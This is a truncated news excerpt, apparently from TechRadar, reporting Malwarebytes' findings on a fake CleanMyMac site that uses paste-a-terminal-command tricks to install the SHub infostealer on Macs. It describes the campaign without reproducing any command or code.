'macOS is becoming a more attractive target, and the tools attackers use are becoming more capable and more professional': Experts warn 'convincing' fake CleanMyMac installs target Apple users to empty crypto wallets
techradar.com
- Fake CleanMyMac utility spreads SHub infostealer
- Attack tricks users into pasting terminal commands
- Malware steals credentials, crypto, and persists via backdoor
A fake utility program for macOs is tricking users into installing an infostealer malware which exfiltrates passwords, sensitive files, and even money, experts have warned.
Security researchers Malwarebytes said the program was a part of a wider, highly sophisticated campaign which also included a custom website, reputable brand spoofing, a loader, and the good old ClickFix approach.
The researchers said the campaign spoofed CleanMyMac, a legitimate mac optimization program built by MacPaw, creating an almost identical website on the cleanmymacos[DOT]org domain, which makes it easy for people to mistake it for the real one. However, instead of simply downloading and running an installer, the victims are asked to open a terminal and paste a command that fetches the payload from a third-party server.
Article ...
Copyright of this story solely belongs to techradar.com . To see the full text click HERE